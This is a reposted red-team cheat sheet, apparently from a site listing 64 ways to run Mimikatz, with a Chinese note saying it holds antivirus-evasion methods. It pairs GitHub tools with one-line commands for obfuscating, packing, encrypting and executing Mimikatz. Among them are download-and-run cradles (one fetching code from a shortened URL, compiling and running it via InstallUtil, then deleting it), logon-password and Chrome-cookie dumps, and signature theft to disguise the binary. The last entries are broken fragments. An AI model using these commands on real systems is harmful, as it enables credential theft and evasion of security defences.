From: https://redteamrecipe.com/64-Methods-For-Execute-Mimikatz/
里面包含一些免杀的方法,在实际情况中按需选择。
go-mimikatz
go build
https://github.com/vyrus001/go-mimikatz
Rusty Mimikatz
cargo build --release
https://github.com/memN0ps/mimikatz-rs
MimikatzFUD
.\Invoke-M1m1fud2.ps1
https://github.com/HernanRodriguez1/MimikatzFUD
pypykatz
pip install -r requirements.txt
https://github.com/skelsec/pypykatz
BetterSafetyKatz
.\BetterSafetyKatz.exe --DumpCreds
https://github.com/Flangvik/BetterSafetyKatz
CopyCat
.\CopyCat.exe --dump --local
https://github.com/mobdk/CopyCat
PyFuscation
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1
https://github.com/CBHue/PyFuscation
Invoke-Cats
Invoke-Cats -pwds
https://github.com/DanMcInerney/Invoke-Cats
WinBoost
csc.exe /platform:x64 /target:exe /unsafe winboost.cs
https://github.com/mobdk/WinBoost
mimidogz
.\Invoke-Mimidogz.ps1
https://github.com/fir3d0g/mimidogz
CoreClass
"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.
https://github.com/mobdk/CoreClass
SharpMimikatz
SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
https://github.com/XTeam-Wing/SharpMimikatz
Invoke-Obfuscation
Set-ExecutionPolicy Unrestricted
https://github.com/danielbohannon/Invoke-Obfuscation
SimpleMimikatzObfuscator
Commands.txt
https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
ClickOnceKatz
pip install pycryptodome requests
https://github.com/sinmygit/ClickOnceKatz
pymemimporter
import base64
https://github.com/n1nj4sec/pymemimporter
SharpDPAPI
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj
https://github.com/GhostPack/SharpDPAPI
Plog
privilege::debug
https://github.com/GamehunterKaan/Plog
StegoKatz
.\StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>
https://github.com/r13mann/StegoKatz
LoadMimikatzWithDinvoke.cs
mimi.bat
https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs
mimikatz-bypass
Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1
https://github.com/corneacristian/mimikatz-bypass
Utils
dotnet build -r win10-x64
https://github.com/ITh4cker/Utils
Eyeworm
python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE>
https://github.com/imsellbaox/Eyeworm
drunkenkatz
beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"
https://github.com/ap3r/drunkenkatz
CallBack
python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>
https://github.com/mobdk/CallBack
mimikatz-byPass-Huorong
python mimikatz_byPass_Huorong.py
https://github.com/q1ya/mimikatz-byPass-Huorong
mimikatz_bypass
python mimikatz_bypass.py
https://github.com/wangfly-me/mimikatz_bypass
HTML-mimikatz-
cmd.exe mimikatz.html
https://github.com/vipserver/HTML-mimikatz-
Mimikatz.exe-in-JS
cmd.exe mimikatz.js
https://github.com/hardw00t/Mimikatz.exe-in-JS
-Have-You-Seen-These-Katz-
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-
MimiRunner
rundll32 *.log,#1
https://github.com/mobdk/MimiRunner
Mimikatz-PE-Injection
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
https://github.com/analyticsearch/Mimikatz-PE-Injection
ninifox
.\Invoke-NiNifox.ps1
https://github.com/scottjosh/ninifox
Chexport
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect`
https://github.com/GamehunterKaan/Chexport
mimik
mimikatz.exe
https://github.com/MisterLobster22/mimik
my-obfuscated-mimikatz
eric.ps1
https://github.com/lazaars/my-obfuscated-mimikatz
Invoke-Mimikatz-W10
.\Invoke-Mimikatz.ps1
https://github.com/VDA-Labs/Invoke-Mimikatz-W10
MimiVader
python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py
https://github.com/lawja/MimiVader
Invoke-Mimikatz
.\Invoke-Mimikatz
https://github.com/syn-ack-zack/Invoke-Mimikatz
Invoke-Mimikatz
.\invokemimikatz.ps1
https://github.com/dfirdeferred/Invoke-Mimikatz
mimikatz_bypass
.\XInvoke-Mimikatz.ps1
https://github.com/izj007/mimikatz_bypass
JS_MimiKatzDropper
cscript.exe dropper.js
https://github.com/leinn32/JS_MimiKatzDropper
mimicats
Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1') Invoke-Cats -Command '"privilege::debug"'
https://github.com/Moon1705/mimicats
XorPacker
python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED
https://github.com/tmenochet/XorPacker
PEzor
PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'
AtomPePacker
PePacker.exe mimikatz.exe -e
https://github.com/NUL0x4C/AtomPePacker
Nim-RunPE
nim c -d:args NimRunPE.nim
https://github.com/S3cur3Th1sSh1t/Nim-RunPE
Nimcrypt2
nim c -d:release nimcrypt2.nim
https://github.com/icyguider/Nimcrypt2
ProtectMyTooling
py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe
https://github.com/mgeeky/ProtectMyTooling
xencrypt
Import-Module ./xencrypt.ps1
https://github.com/the-xentropy/xencrypt
BetterXencrypt
Import-Module ./betterxencrypt.ps1
https://github.com/GetRektBoy724/BetterXencrypt
AES-Encoder
Invoke-AES-Encoder -InFile
https://github.com/Chainski/AES-Encoder
mortar
./encryptor -f mimikatz.exe -o bin.enc
https://github.com/0xsp-SRD/mortar
.NET-Crypter
Browse Executable:
https://github.com/roast247/.NET-Crypter
Custom mods + Invoke-Obfuscation
sed
https://github.com/newlog/fud_mimikatz_talk
Obfuscated_Invoke-Mimikatz
sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1
https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz
mimikatz_encoded
certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit
https://github.com/mobx26/mimikatz_encoded
Encrypted_Mimikatz
.\decrypt.ps1
https://github.com/Sombody101/Encrypted_Mimikatz
SigThief
sigthief.py -i c: \Windows\System32\consent.exe -t mimikatz. exe -o MSCredentialTool.exe
https://github.com/secretsquirrel/SigThief
memory+suspended
#include <stdio.h>
XOR’d with 0xFF
#include <iostream>
XORing each character with the value 0xAA
#include <stdio.h>
Decoding and storing it in memory
#include <iostream>
Inject and execute Mimikatz in memory
#include <windows.h>